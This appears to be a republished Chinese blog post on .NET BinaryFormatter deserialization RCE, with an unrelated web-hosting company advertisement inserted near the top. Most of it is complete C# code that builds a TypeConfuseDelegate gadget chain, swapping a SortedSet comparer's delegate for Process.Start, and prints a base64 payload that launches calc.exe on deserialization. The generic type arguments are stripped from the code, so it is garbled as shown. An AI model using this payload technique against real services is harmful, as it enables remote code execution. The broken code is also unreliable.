.Net反序列化漏洞之BinaryFormatter
https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html
目前创新互联公司已为上1000家的企业提供了网站建设、域名、虚拟空间、网站改版维护、企业网站设计、汇川网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。
.Net反序列化导致RCE的样例,有两点限制:
- BinaryFormatter::Deserialize反序列化的内容用户可控
- .Net SDK大于等于4.5
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Threading.Tasks;
namespace Deserializer
{
class Program
{
public static void getCalcPayload()
{
// Create a simple multicast delegate
Delegate d = new Comparison(String.Compare);
Comparison d2 = (Comparison)MulticastDelegate.Combine(d, d);
// Create set with original comparer
IComparer comp = Comparer.Create(d2);
SortedSet set = new SortedSet(comp);
set.Add("calc");
set.Add("adummy");
TypeConfuseDelegate(d2);
BinaryFormatter formatter = new BinaryFormatter
{
AssemblyFormat = FormatterAssemblyStyle.Simple
};
using (MemoryStream stream = new MemoryStream())
{
formatter.Serialize(stream, set);
int position = (int)stream.Position;
byte[] array = stream.GetBuffer();
Array.Resize(ref array, position);
String payload = Convert.ToBase64String(array);
Console.WriteLine("Calc.exe PayLoad:" + payload);
//FileSystemUtils.Pullfile(payload, "payload_calc.dat");
stream.Position = 0;
formatter.Deserialize(stream);
}
}
static void TypeConfuseDelegate(Comparison comp)
{
FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance);
object[] invoke_list = comp.GetInvocationList();
// Modify the invocation list to add Process::Start(string, string)
invoke_list[1] = new Func(Process.Start);
fi.SetValue(comp, invoke_list);
}
static void Main(string[] args)
{
getCalcPayload();
}
}
}
当前文章:.Net反序列化漏洞之BinaryFormatter
文章路径:http://myzitong.com/article/gesdje.html